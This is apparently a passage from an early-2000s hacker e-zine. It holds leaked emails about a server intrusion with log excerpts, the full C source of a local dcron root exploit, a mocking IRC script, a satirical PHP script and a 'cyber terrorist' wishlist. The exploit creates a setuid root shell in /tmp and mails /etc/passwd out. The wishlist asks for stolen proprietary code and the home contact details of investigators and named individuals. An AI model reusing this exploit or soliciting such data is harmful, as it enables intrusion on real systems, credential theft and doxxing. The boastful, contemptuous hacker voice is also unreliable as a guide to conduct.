BELIEVE THAT LOGDIN WAS HIS OTHER HANDLE. WELL TO MAKE THE STORY SHORT,
IT SEEMS HE PISSED OFF SOME REAL DIGITAL COWBOYS, WHO EVENTUALLY GAINED
ACCESS TO EVERY BOX DAP HAD ACCESS TO AND REMOVED THEM ALL. KEEP IN MIND
THAT THE INFO IN THESE EMAILS IS TOLD BY AN APPARENT IDIOT WHO DOESN'T
KNOW WHAT HE IS TALKING ABOUT. THE HEADERS HAVE BEEN TAKEN OUT AND SOME
TEXT X'D OUT TO PROTECT. ANYWAY, ENJOY AND ADD THIS TO THE RMARCHIVE.

************************************************************
*THIS EMAIL IS FROM <tharaven0@home.com> to <hert@hert.org>*
*THE SUBJECT IS <Recent hacks from hert.org> *
************************************************************

Hi. about 1 hr ago someone from np9.hert.org logged in and rm -rf the 5
machines related and then logged into portal.suidrewt.org and rm'd dirs such
as /home/* and /var/logs they were killed before anymore damage could have
been done. would u please help us to resolve this problem by forwarding the
logs from that user using that ip at that time. We understand HERT.ORG is to
help people and not promote acts of distruction such that has happened. alot
of important data was lost off our machines.We would just like to find the
user doing the damage. any effort you can provide would be valueable and
very well appreicated.

Thanks

Tha-Raven

*******************************************************************************
*THIS EMAIL IS FROM <hege@hert.org> to <tharaven0@home.com> cc <hert@hert.org>*
*THE SUBJECT IS <What the fuck> *
*******************************************************************************

> Hi. about 1 hr ago someone from np9.hert.org logged in and rm -rf the 2
> machines related and then logged into portal.suidrewt.org and rm'd dirs such
> as /home/* and /var/logs they were killed before anymore damage could have
> been done. would u please help us to resolve this problem by forwarding the
> logs from that user using that ip at that time. We understand HERT.ORG is to
> help people and not promote acts of distruction such that has happened. alot
> of important data was lost off our machines.We would just like to find the
> user doing the damage. any effort you can provide would be valueable and
> very well appreicated.
>
>
>
> Thanks
>
> Tha-Raven

What the fuck is that ?
Could you please send more information ?

I remember that this server is hosted graciously by ColtFR.
We dont pay for the service. And in the motd it is written that
"No hacking, No pinging, No probing, Nothing that will pose a threat to anyone"
Next time, such things happen, i go myself unplug this machine
from the machine room, even against GAIUS's wills.

--
Carrel Dominique


***************************************************************************
*THIS EMAIL IS FROM <hege@hert.org> to <hert@hert.org> cc <tharaven0@home>*
*THE SUBECT IS <server use> *
***************************************************************************

hi

In response of the mail from Raven, I would like to remind you
some information about this machine.

This machine is hosted by ColtFr in Paris, XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

The only one condition that this machine stay (and will stay) there
is that nothing has to happen from this machine. XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

This machine is very usefull for lot of people, irciing, mailing, web hosting
... More over, this machine is also hosting gaius's company web server
or non hert related stuff.

So if eveybody behave carefully, and honestly, this machine would stay
long time, else i will remove the machine myself from the machine room
This is the condition, i dont want to have problem, and i dont want
to imagine how will be the face of my XXXXXXXXXXX receiving mail about
cracking attempt from XXXXXXXXXXXXXXXXXXXXXXXXXXX. I hope it is enough
self-understandable.

Thx for behaving with your brain.

p.s. : there is enough vulnerable machine over the Internet
that Np9.hert.org doesnt need to be a starting point for hacking.

--
Carrel Dominique


*****************************************************************************
*THIS EMAIL IS FROM <ultor@vaubansys.com> to <force@hert.org> cc <tharaven0>*
*THE SUBJECT IS <Re: [hert] Recent hacks from hert.org> *
*****************************************************************************

> What the fuck is that ?
> Could you please send more information ?
>
> I remember that this server is hosted graciously by ColtFR.
> We dont pay for the service. And in the motd it is written that
> "No hacking, No pinging, No probing, Nothing that will pose a threat to
anyone"
>
> Next time, such things happen, i go myself unplug this machine
> from the machine room, even against GAIUS's wills.

Yeh it's kinda weird ... I believe gaius should check who the fuck did
something like that from HERT.

Best Regards,

Marek Bialoglowy [Ultor@hert.org] ----- NETWORK SECURITY CONSULTANT
GROUP: HERT (www.hert.org) - PGP: http://www.hert.org/pgp/Ultor.asc
JOB: Vauban Systems -- Jakarta, Indonesia -- Timezone: JAVT, GMT +7


****************************************************************************
*THIS EMAIL IS FROM <rlogan@xxx.com> to <hert@hert.org> cc <tharaven0@home>*
*THE SUBJECT IS <Re: [hert] Recent hacks from hert.org> *
****************************************************************************

Hege,

Let's get all the facts before pointing fingers or getting upset.

Look at the domain name. @home.com are FUCKING idiots, and this is just one user.
@home also accused me of hacking, when it was an errant mail program sending icmp
packets out of their network.

Once again, let's get the whole story before RE-Responding to theraven0@home.com(gay email address).

Sangfroid

-> > Hi. about 1 hr ago someone from np9.hert.org logged in and rm -rf the 2
-> > machines related and then logged into portal.suidrewt.org and rm'd dirs such
-> > as /home/* and /var/logs they were killed before anymore damage could have
-> > been done. would u please help us to resolve this problem by forwarding the-> > logs from that user using that ip at that time. We understand HERT.ORG is to
-> > help people and not promote acts of distruction such that has happened. alot
-> > of important data was lost off our machines.We would just like to find the
-> > user doing the damage. any effort you can provide would be valueable and
-> > very well appreicated.
-> >
-> >
-> >
-> > Thanks
-> >
-> > Tha-Raven

--
Ralph Logan -- XXX LLC
p: XXX
f: XXX


***************************************************************************
*THIS EMAIL IS FROM <acz@vaubansys.com> to <force@hert.org> cc <tharaven0>*
*THE SUBJECT IS <Re: [hert] Recent hacks from hert.org> *
***************************************************************************

I will check asap.

***************************************************************************
*THIS EMAIL IS FROM <acz@vaubansys.com> to <force@hert.org> cc <tharaven0>*
*THE SUBJECT IS <Re: [hert] Recent hacks from hert.org> *
***************************************************************************

Dear Raven,

We take this problem seriously and we have a very strict acceptable use
and security policy here. We are investigating the problem.
HERT members are mostly security researchers, professionals, CS students.

1/ You said "someone from np9.hert.org logged in"
logged in with which account, which service, what time exactly?

2/ What kind of system is 195.13.119.227 running? which services were open?

3/ Is there any relationship between your users and any HERT member? (dispute, argument, ...)

4/ Can you ask your ISP for a netmon output for your ip at the time of the intrusion?

Best regards,

Anthony

grep 195.13.119 /hert/home/*/.ssh/known_hosts
no results

np9# grep 195.13.119 *
security:Sep 5 23:08:48 np9 sshd[28395]: Failed password for ROOT from 195.13.119.227 port 22919 ssh2
security:Sep 5 23:08:49 np9 sshd[28395]: Connection closed by 195.13.119.227

np9# zcat *gz|grep 195.13.119 /var/log
np9# zcat *gz|grep suidrew /var/log

no results


np9# grep 195.13.119 *|tai64nlocal /var/log/httpd
2001-09-06 00:24:48.994072500.s:@400000003b969aa51dee9edc tcpserver: pid 28725 from 195.13.119.226
2001-09-06 00:24:48.994072500.s:@400000003b969aa51defd75c tcpserver: ok 28725 0:195.68.87.28:80 :195.13.119.226::51920
2001-09-06 00:24:48.994072500.s:@400000003b969aa9177132a4 195.13.119.226 read ./0/index.html: success

--
/* Anthony C. Zboralski <acz@vaubansys.com>
Vauban Systems - http://vaubansys.com
3104 - 06, 31st floor, Jl. Kemang Utara VII A/4A,
Central Plaza, 18 Harbour road, Jakarta 12370,
Hong Kong Indonesia
Tel: +62 21 719 88 56 JAVT (GMT+7) Fax: +62 21 719 88 46
0CE111D4 -> 74F2 EB44 9DDB 2EDD C654 29E9 63A1 4F42 0CE1 11D4
*/


****************************************************************************
*THIS EMAIL IS FROM <hege@hert.org> to <hert@hert.org> cc <vince@site5.com>*
*THE SUBJECT IS <Re: [hert] Recent hacks from hert.org> *
****************************************************************************

well

the real guy is vince@site5.com not raven, raven is just a friend, of the
hacked guy.

What happened is easy :
Someone entered in to dap's machine using jimjones account.
And someone entered in the vince machine using dap account.
In the dap's home there was the passwd of root. then the guy
rm /var/log and /home/*
he was trying to upload a tarball from np9
ending by 9.tar.gz or 9.tgz
so making a research in all home for *9.*gz would be usefull.

and the guy who entered on vince machine (portal.suidrewt.net) was from np9
at 21h30/40 gmt+0 (for us its gmt+1 on np9)


thats all
regards


--
Carrel Dominique

**************************************************************************
*THIS EMAIL IS FROM <f1ex@maxis.net.my> to <hert@hert.org> cc <tharaven0>*
*THE SUBJECT IS <Re:[hert] Recent hacks from hert.org> *
**************************************************************************

Who's been hacking from np9? Gaius, Hege, I think we should do a trace
on this and check out who is behind this. Anyway before this I found
that some of the exploit codes are leak out during plan9.

f1ex

Jeremy Lin (MCP) (f1ex@maxis.net.my)
Chief Technology Officer
WAP Dot Com Sdn Bhd
Microsoft Certified Professional
Hackers Emergency Response Team (HERT)


***********************************************************
*THE DoD RUNDOWN OF THE EVENTS ON SEPTEMBER 7TH (NOT 11TH)*
***********************************************************

*1* HACKERX AQUIRED DAP'S LP ON LOGDIN.COM THROUGH PASSWORD GUESSING
*2* HACKERX THEN ROOTED THE BOX LOCALLY WITH A ZERODAY KERNEL EXPLOIT
*3* HACKERX THEN BACKDOORED SSH AND GRABBED LOGINS AND PASSWORDS
*4* HACKERX THEN TURNED TOWARDS MECCA AND PRAYED
*5* HACKERX THEN RECITED A SENTENCE FROM THE KORAN
"THE AMERICANS ARE TRESSPASSING ON OUR INTERNET
HOLY-LAND, RM THEM AND THEIR BOXES"
*6* HACKERX USED AIM TO COMMUNICATED TO ATTA TELLING HIM DAP WILL BE RM'D
*7* HACKERX LOGS INTO EVERY MACHINE DAP WAS ON AND GAINS ROOT WITH ODAYS
*8* HACKERX DOWNLOADS THE ENTIRE HARDDRIVE IMAGES FOR LATER OPERATIONS
*9* HACKERX SIMULTANIOUSLY RM'S EVERY BOX WITH THE ALLTERMRM.C CODE
v-v-vV-vv-v_VV_V_v-v-vZ-v-Z-vV LIGHTS OUT ------------------------------
^ flatline




.~v~----------------------------------------------------------~v~.
; *08* ~v~ local cron exploit (dcron) -- 0day by lcamtuf/nergel ;
`----------------------------------------------------------------'

[BEGIN_DIR] 0day
[CUT_HERE] dcron.c

/*************************************************************************\
| ----====----====---- . . LOCAL DCRON EXPLOIT . . ----====----====---- |
| |
| brought to you by |
| |
| (C) Michal Zalewski <lcamtuf@ids.pl> . and . Nergal <nergal@icm.edu.pl> |
| |
| ----------------------------------------------------------------------- |
| Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] |
| ----------------------------------------------------------------------- |
| |
\*************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define PRINT_STATUS(x,p...) printf("\033[1;35m:::\033[0;35m "x,##p)

char*cron_path;
char*email_address;
extern char**environ;

void print_banner(void) {
printf("\033[1;37m\t\t ---===---===--- \033[0;31md\033[1;31mcron ");
printf("\033[1;33mLOCAL \033[1;36m EXPLOIT \033[1;37m---===---===---\n");
}

void print_help(void) {
printf("\n\t\tUsage:");
printf("\t\033[0;35m./dcron -e your_email [-p path_to_crond]\n");
printf("\033[0;37m\n");
}

void make_tempfile(void) {
FILE*temp;
char*file="nnn";
if((temp=fopen(file,"w"))==NULL) {
perror("fopen!!!");
(void)exit(1);
}
fprintf(temp,"###############################\n");
fprintf(temp,"## DCRON EXPLOIT - TEMP FILE ##\n");
fprintf(temp,"###############################\n");
fprintf(temp,"\n");
fprintf(temp,"crontab - << EOF\n");
fprintf(temp,"* * * * * %s\n",cron_path);
fprintf(temp,"EOF\n");
fprintf(temp,"\n");
fprintf(temp,"mail %s < /etc/passwd\n",email_address);
fprintf(temp,"chmod 4755 /tmp/boomsh\n");
fprintf(temp,"rm -f /tmp/cron* /tmp/gcc*\n");
fprintf(temp,"\n");
fprintf(temp,"crontab -d 2>&1 1>/dev/null\n");
fprintf(temp,"printf '\033[0;37m'\n");
fprintf(temp,"\n");
fprintf(temp,"## DONE!\n");
fflush(temp);
fclose(temp);
(void)chmod(file,0755);
PRINT_STATUS("Tempfile ready!\n");
}

void add_crontab_entry(void) {
int status;
pid_t pid;
if((pid=fork())==0) {
(void)execl("/usr/bin/crontab","-c","./",NULL);
(void)_exit(-1);
}
(void)sleep(1);
(void)waitpid(pid,&status,0);
}

void remove_crontab_entry(void)
{
int status;
pid_t pid;
if((pid=fork())==0) {
(void)execl("/usr/bin/crontab","-d","./",NULL);
(void)_exit(-1);
}
(void)sleep(1);
(void)waitpid(pid,&status,0);
}

void bombard_crond(void) {
int i;
setenv("PATH","/var/spool/cron:/usr/bin:.:/bin/:/usr/sbin",1);
for(i=0;i<3;i++) {
PRINT_STATUS("Adding a crontab entry ... \033[1;32m(%d/3)\n",i+1);
add_crontab_entry();
PRINT_STATUS("Removing the entry ... \033[1;32m(%d/3)\n",i+1);
remove_crontab_entry();
}
PRINT_STATUS("Processing...!!\n");
}

void make_boomsh(void) {
u_char buf[5000];
int sh,boomsh,e;
sh=open("/bin/bash",O_RDONLY);
if(sh==-1) {
perror("copy!!!");
(void)exit(1);
}
boomsh=open("/tmp/boomsh",O_WRONLY|O_CREAT);
if(boomsh==-1) {
perror("copy!!!");
(void)exit(1);
}
while((e=read(sh,buf,5000))>0) {
(void)write(boomsh,buf,e);
}
(void)close(sh);
(void)close(boomsh);
(void)chmod("/tmp/boomsh",0755);//crond will make it 4755 root!!!
}

void shell(void) {
PRINT_STATUS("\033[1;37m ----====---- \033[1;36m EXPLOIT \033[1;32m FINISHED \033[1;37m ----====----\n");
PRINT_STATUS("\033[1;37m ---====-- \033[1;34m WAITING \033[1;35m FOR\033[5;33m ROOTSHELL! \033[1;37m --====---\n");
PRINT_STATUS("\033[1;37m ---====-- \033[1;34m HIT RETURN \033[1;35m TO
\033[5;33m SYNC!!!! \033[1;37m --====---\n");
PRINT_STATUS("\033[1;37m ----=====---- \033[1;32m!\033[1;34m!\033[5;0n!\033[1;33m!\033[5;0n!\033[5;0n!\033[0;30m ----====----\n");
execle("/tmp/boomsh","boomsh",NULL,environ);
}


#define DEFAULT_EMAIL_ADDRESS "your-address@mail.com"
#define DEFAULT_CRON_PATH "/usr/sbin/crond"

char* email_address = DEFAULT_EMAIL_ADDRESS;
char* cron_path = DEFAULT_CRON_PATH;

void get_options(int argc,char*argv[])
{
int a;
#define GETOPT_ARGUMENTS "p:e:h"
while((a=getopt(argc,argv,GETOPT_ARGUMENTS))!=EOF) {
switch(a) {
case 'p':
cron_path=(char*)strdup(optarg);
break;
case 'e':
email_address=(char*)strdup(optarg);
break;
case 'h':
default:
(void)print_help();
(void)exit(0);
}
}
if(cron_path) {
cron_path=DEFAULT_CRON_PATH;
}
if(email_address) {
email_address=DEFAULT_EMAIL_ADDRESS;
}
}

// MAIN

int main (int argc,char*argv[]) {
(void)print_banner();
if(argc<2) {
(void)print_help();
(void)exit(0);
}
(void)get_options(argc,argv);
PRINT_STATUS("Making /tmp/boomsh...\n");
(void)make_boomsh();
PRINT_STATUS("Making tempfile...\n");
(void)make_tempfile();
PRINT_STATUS("Bombing crond...\n");
(void)bombard_crond();
PRINT_STATUS("ROOTSHELL ENJOY!!!\n");
(void)shell();
}
[END_CUT] dcron.c
[END_DIR] 0day




.~v~----------------------------------------------------------~v~.
; *09* ~v~ bl4zt fr0m the p4st.bx -- ANONYMOUSEHACKER ;
`----------------------------------------------------------------'

[BEGIN_DIR] 0day
[CUT_HERE] fucknutz.bx
# fucknutz.bx - 100% LaYmE, 100% DuMb, 100% WaSt3 0f T1m3
# BuT iTZ 1am, G1b m3 4 Br34k.
#
# wh0rd t0 #ashtray and #b4b0
# aND #phrack and #2600 NaTuRALLy!@!@!@!
# ALsO whURD t0 mY BeSteST fr13nD --> CocA1n3.
#
# sus4n
# Th3 m1ND aND BoDY oF a M4n BuT th3 N1ck Of a cH1cK.
#

assign fucknutz FucknutZ.bx-(sus4n)
assign fuck -=FucknutZ=-

^eval echo $G $FucknutZ.bx rUNN1nG!@
^eval echo $G $ It SuCkz bUT h0h0 wh0 g1VeZ a SHiT?@#
^eval echo $G $ InCaSe j00 SuCK TypE /hUhELp he0he0h0
^eval echo $G $ Ph33R sus4n's M4d bX Sk1LLz@!#

alias hUhELp {
eval echo $fuck -=-=-=-=-=-=-=-=- FuCkNutZ -=-=-=-=-=-=-=-=-
eval echo $fuck h0h0 j00 Ask3D f0r HeLp j00 DuMB FuQZ
eval echo $fuck NeXT j00 w1LL b3 BeGG1n FoR Ju4R3Z!@!
eval echo $fuck /statd <channel> YoU n33d A sHELL t0 StATD fr0M!@!
eval echo $fuck /hacker TeLL DuH WoRLd 4B0uT j00r HaX!
eval echo $fuck /advert <channel> AdVerT1ZE b4b0 f0r Us Bi0tch!@
eval echo $fuck /digitalx L3t Th3 w0rLd gn0 wh0 b3 DuH m4n!
eval echo $fuck /h0h0 buST oUT d4 Qu0TeZ@!@
eval echo $fuck /so1o <nick> C0d3 Zer0 Begg1N tEkNeeQ!@!@
}

alias statd {
/notice $0 4nyY0n3 h4v3 4 sh3LL eYe c4n St4tD Fr0M?!#?
}

alias hacker {
timer 1 {/msg |JP| YuH, L1k3 h1Gh, I haCk3d GoV s3Rv3Rz DuDe - Ph33R my PHF Tek
NeeQ}
timer 2 {/msg |JP| So.....CaN j00 MaK3 m3 fAM0uS 0n 4NT1-0NL1N3?!?@#}
timer 3 {/msg |JP| I'LL g1B j00 m4D D0X aND backbone.jpg th4t p4r1ty p4t puLLeD
!#!}
}

alias advert {
timer 1 {/me Re4Dz b4b0, d0 j00?!@}
timer 3 {/say b4b0! b4b0! b4b0! Ev3rY0n3 Lubb0rz Th13r b4b0!}
timer 5 {/say GeT y0ur fux0r1ng b4b0 heRe N0W!@!!}
timer 7 {/say http://veloweb.com/b4b0}
timer 8 {/say http://veloweb.com/b4b0}
timer 9 {/say http://veloweb.com/b4b0}
timer 11 {/notice $0 http://veloweb.com/b4b0 j00 fuq1NG Lam3 biTch3Z!!!@~@}
}

alias digitalx {
@ old_nick = [$N]
nick digitalx_
timer 2 { /say i'll give you pbx's if you stop kicking me}
timer 4 { /say look guys, this is _not_ funny, stop kicking me}
timer 6 { /say guys...i'll give you 5 pbx's}
timer 8 { /say just email me, and please, do not ban me}
timer 10 { /say i'll be gone now, but _please_ do NOT ban me}
timer 12 nick $old_nick
}

alias h0h0 {
eval say $h0[$rand(14)]
}

@h0.0=[<DethCraze> I never do malicious things.]
@h0.1=[<tewl> I jerked off 40 minutes today]
@h0.2=[<Digitalx_> the only way ill help if you stop kicking and banning me]
@h0.3=[<Digitalx_> tell r4lph to stop banning me]
@h0.4=[<VeNoMouS> wtf is j00r problem?]
@h0.5=[<DethCraze> I did not do anything.]
@h0.6=[<DethCraze> I did not rm _anything_.]
@h0.7=[<ph1sh> ftp.nike.com, go download some shoes]
@h0.8=[<gr1p> *8-)]
@h0.9=[<so1o> hook me up with 0-day sendmail code!%$*&]
@h0.10=[<so7o> you are a coder ...i am a hacker ..lets just get this straight]
@h0.11=[<aqua> I HAVE BO SKILLZ!@#!@#!@#!@#]
@h0.12=[<F0> gob/#ashtray kisses tewl]
@h0.13=[<Hamster> I jerked off 40 minutes ago]
@h0.14=[<AvGj03> im going to jurk off]


alias so1o {
@ old_nick = [$N]
nick so1o
timer 2 { /say ok, I need juarez, so I can 0wn shit. }
timer 4 { /say Hmm..wh0 c4n h00k m3 up?! }
timer 6 { /msg $0 dude, h00k m3 uP w1th k0d3z.}
timer 8 { /msg $0 eYe n33d th3m f0r muh w0rk.}
timer 10 { /msg $0 cmon dude, h00k m3 up alr34dy!!@#}
timer 12 { /msg $0 d0n't m4k3 m3 st4td jew d00d!@}
timer 14 { /msg $0 juSt g1b m3 k0d3z 4nd t3ll m3 h0w t0 run 1t d4mm1t!@!}
timer 16 { /msg $0 d00d, y0u suck...y0u w1ll b3 hax3d!@!@! cZo sTyLe!@}
timer 18 { /msg $0 0h sh1t, i c4n't hax j00 :/ y0u no run SunOS 5.4 d4mm1t@!#}
timer 20 { /msg $0 j00 suCK and j00 are 0wned by cZo ph34r n4t10n!@!@@#}
timer 22 {/msg $0 ph34r cZo, ph34r CRH, and ph34r so1o BaYbEE!#!@}
timer 24 nick $old_nick
}

^eval set format_version $format_version + $fucknutz
[END_CUT] fucknutz.bx
[END_DIR] 0day




.~v~----------------------------------------------------------~v~.
; *10* ~v~ private TESO press statement software (leaked) -- TESO;
`----------------------------------------------------------------'

[BEGIN_DIR] 10_teso
[CUT_HERE] statement.php
<?php
##
## TESO (R) Public Press Statement (tm) generator.
##
## Usage: http://www.team-teso.php/leaks/statement.php?warez=<exploit>
##
## This will check for the existance of the requested exploit.
## If it exists, it is considered leaked and an appropriate
## TESO Public Press Statement (tm) is automatically generated.
##

## Was a specific exploit requested?
if (!isset('warez')) {
## No. List all possible exploits.
printf ('Probable leaks:<br><br>');
if ($dir = opendir('/teso/exploits/')) {
while (($file = readdir($dir)) != false) {
printf ('Leak of <a href="statement.php?warez=$file">$file</a><br>');
}
closedir ($dir);
}
return;
}

## Does the exploit exist?
if (file_exists('/teso/exploits/$warez/') || file_exists ('/teso/exploits/$warez.c')) {
## Yes. Write a statement on it.
printf ($warez . ' exploit statement<br><br>');
printf ('This is a public statement to clarify the situation surrounding ');
printf ('the exploit for ' . $warez . ' software.<br><br>');

## Display the exploit's header which contains the vulnerability history.
passthru ('head -n 2300 /teso/exploits/$warez.c');

## Basic advertisements for TESO's customers.
printf ('There are only ' . rand(1,6) . ' publicly disclosed exploits ');
printf ('to TESO's (R) best knowledge. However, they are all very very ');
printf ('limited in their capabilities, would not work in the wild, and ');
printf ('do not have TESO (R) User-Friendly Brute-Force (tm) routines ');
printf ('nor a TESO Progress Bar (tm) with percentages of completion.<br><br>');

## Objective exploit description.
printf ('TESO Security (R), and many other inferior research groups started ');
printf ('researching this vulnerability. Only TESO's Exploit (tm) is able ');
printf ('to penetrate almost all versions of the aforementioned software ');
printf ('for almost all platforms successfully.<br><br>');

## Promote TESO(R) services and products.
printf ('This vulnerability should be considered serious nevertheless, ');
printf ('since the experience has shown that even very very complicated ');
printf ('vulnerabilities can be exploited by skilled attacker masterminds, '); printf ('<a href="BIND">https://www.TESOstore.com/shop/t/tsig.php">BIND TSIG<a>, '); printf ('<a href="telnetd<a">https://www.TESOstore.com/shop/t/telnetd.php">telnetd<a>, ');
printf ('<a href="SSH">https://www.TESOstore.com/shop/s/ssh.php">SSH deattack<a> and ');
printf ('<a href="WU-ftpd<a">https://www.TESOstore.com/shop/w/wufmt.php">WU-ftpd<a>, ');
printf ('come to mind. TESOstore (R) accepts all major credit cards.<br><br>');

## Emphasize TESO's (R) innocence.
printf ('Having developed ' . $warez . ', TESO Security (R) decided not to '); printf ('make it public directly, since it would cause damage to a lot of ');
printf ('systems. Instead, members and friends of TESO Security (R) uploaded ');
printf ('the exploit to various acquired boxen. Any subsequent public release
');
printf ('could then not be blamed on TESO Security (R) members/friends but '); printf ('the administrators of the specific box.<br>');
printf ('Discovering what box caused the leak is easy with TESO's (R) ');
printf ('Exploit FingerPrinter (tm), and TESO Security (R) will then know not
');
printf ('to upload exploits to that specific box again in order to prevent '); printf ('future leakage.<br><br>');

## Try and explain the message `this sploit already rooted nasa.gov ;/'.
printf ('The ' . $warez . ' exploit was developed for research purposes only,
');
printf ('but this private research software has (of course) leaked and was '); printf ('probably traded by very very bad, evil and malicious hackers since ');

## Find possible leak date. Use the file's creation time -- close enough.
printf (date('l, F dS', stat ('/teso/exploits/$warez.c')[9] . '. ');
printf ('The source of leak has been identified and will be eliminated: <br>');
## Show the source of leak, and eliminate it.
passthru ("cat leak.c");
passthru ("rm -f leak.c");

## Physical location of an official Media Statement.
printf ('TESO Security (R) will be accepting Members of the Press in the ');
printf ('Media Room at TESO Security (R) headquarters in both Germany and ');
printf ('Austria, tomorrow (' . date('l, F dS', time() + 86400) . ') at ');
printf ('07:35:00 EST-5.<br>');

## Schedule this Press Statement.
system ('echo "Press Statement for '. $warez .' tomorrow at 7:35" |wall');

## Standard epilogue.
printf ('We sincerely regret that our research software is used for ');
printf ('malicious purposes by other people than us. We have taken all ');
printf ('necessary actions to avoid such happenings again.<br><br>');
printf ('Sincerely,<br>');
printf ('<a href="TESO">http://www.team-teso.com">TESO Security</a> (R)<br>');
printf ('Public key: <a href="here</a><br>');">http://gpg.7350.org/teso.key">here</a><br>');

## Legal Disclaimer.
printf ("THIS PRESS STATEMENT IS PROVIDED AS-IS WITHOUT WARRANTY OF ');
printf ("ANY KIND, EITHER EXPRESS OR IMPRESS INCLUDING, BUT NOT LIMITED ');
printf ("TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR ');
printf ("A PARTICULAR PURPOSE. ALL OTHER LIMITATIONS ON LIABILITY ');
printf ("CONTAINED IN THE APPLICATION EXPLOIT - $warez - PRODUCT END ');
printf ("USER LICENSE AGREEMENT SHALL APPLY. AMEN.<br><br>');

## Commercials
printf ("Get your private, free channel at http://www.ircs.org.<br>");
}
?>
[END_CUT] statement.php
[END_DIR] 10_teso




.~v~----------------------------------------------------------~v~.
; *11* ~v~ real cyber terrorist -- cripto ;
`----------------------------------------------------------------'

I run a underground hacker group called SUBTERRAIN, I am a cyber terrorist,
my system was owned a while back - so there is no reason to keep my wishlist
private any longer, so here is my wishlist:

WANTED SOURCE CODE
==================

Commercial:
===========

o Checkpoint FW-1
o Secure Computing's Sidewinder Firewall that runs on SecureOS (bsdi 3.0
with mandatory access controls).
o Cisco SNMP libraries for rebuilding IOS.
o IOS 12.x
o Cisco Secure IDS (or older NetRanger)
o Entrasys Dragon IDS (not the older free research version)
o AscendOS (for dialin concentrators and such) [renamed after Lucent buyout?]
o HP/UX 11.x
o IRIX 6.5.x
o Trusted IRIX anything
o Trusted solaris anything
o Xenix (any version)
o Windows NT 4.0 (server and workstation)
o Windows 2000 (pro/adv)
o JunOS (used on Juniper Networks's core backbone routers)
o Cisco Aeronet base-station Flash ROM code.
o VanDyke's SecureCRT
o F-Secure SSH server/daemon for UNIX or NT.
o HP JetDirect Flash ROM code.
o NAI SnifferPro (any version). PC software and hardware rom code & specs.
o Latest commercial PGP from NAI
o AS/400 or other whack IBM mainframe OS.
o Solaris commercial c-compiler code.
o Commercial Tripwire source.
o ISS

ADM:
====

o ADM's x25 software

Misc:
=====

o 1i0n worm
o Ramen worm
o Adore/Red worm

crypto:
=======

o any new algorithms schnier's working privately


WANTED INFORMATION
==================

Telco:
======

o Phone numbers over POTS to any computer systems, PBXs, routers, internal
networks. Found, overheard, wardialed, discovered, stumbled upon, whatever.
They better have a "last verified working on" date.
o Information on any private corporate networks, packet-switched or not.
o Public packet-switched network information.
o Network topology diagrams of any network.
o BETTER guides to using DMS-100, and ESS switches than the bullshit from
DeadKat and Disorder back in the early 90s. Even if they are SE'd from
Nortel, that would be fine.

Cellular:
=========

o the dr. who's radiophone tarball. (working on it).
o information on the new motorola timeport.
o physical descriptions of cell sites by any manufacturer, and their
intrusion detection safeguards.
o software for pocsag pager decoding (i'll grab off web later).
o plans for physical devices to snarf pocsag or flex pager transmissions
o physical DDI plans, and/or software.

Radio:
======

o Frequencies for various sundry organizations that deserve to be monitored.
(metro police for large cities within and outside of the US), certain air
traffic for various airlines, etc.
o Recommended equipment: trancievers, scanners, places to buy from, etc.

Satellite:
==========

o Lists of manufacturers of satellite communications equipment.
o Lists of companies that have satellite networks, with descriptions of
their network and capabilities.

Misc:
=====

o hardcopy or OCRd terrorist manuals from muslim extremist groups.
(yes, they exist.)
o names of NSA software development projects with descriptions, and
a list of the employees working on the project.
o historical hacker scene information. old articles OCRd from newspapers
that describe significant events (busts, breakins, etc).
o any old code that mitnick stole from shimomura (old oki stuff that
he wrote with lottor after reverse-engineering them)
o lists of invididuals, job titles, descriptions, and contact information
(home or work) for people in the FBI, Secret Service, Military, Navy,
Army, or for large Corporations or Defense Contractors responsible for
reacting to computer security breakins or investigating computer crime.
o Lists of individuals that have participated as expert witnesses in
computer crime court cases.
o The real reason why Pete Shipley was fired from his position at OneSecure
as Director of Labs.
o Jeff Moss's personal phone numbers (home & cell)

Mission impossible? Possible. If you have any of this stuff, email
me at jbl@subterrain.net or cripto@subterrain.net. Keep in mind
IMMMMMMMMMMMM AAAAAA CYBERRRRRRRRRRRRR TERRRRRRRRRORRRRRRRISTTTTTTT




.~v~----------------------------------------------------------~v~.
; *12* ~v~ cisco coder cant code -- ReDPUBeZ ;
`----------------------------------------------------------------'

y0, th1s iz redpubez, redDr4g0n'z step-son. th3r3's this d00d nam3d
v4cuum, some h4ckphreak/phrack guy. s0meh0w he g0t a j0b @ cisco
c0d1ng f0r them. eye h4ve n0 idea how. anyw4ys h1s webp4ge is
www.datanerds.net/~vacuum, letz ch3k th3 k0de s3cti0n 0ut.

Index of /~vacuum/code (p1 of 2)
[DIR] Parent Directory 17-Nov-2001 00:21 -
[ ] broadscan.c 28-Oct-2000 15:31 2k
[ ] cgi2.c 28-Oct-2000 15:31 7k
[ ] dialer.cpp 28-Oct-2000 15:31 3k
[ ] escape.cpp 28-Oct-2000 15:31 1k
[ ] event.cpp 28-Oct-2000 15:31 2k
[ ] execiis-win32.c 01-Jul-2001 13:36 3k
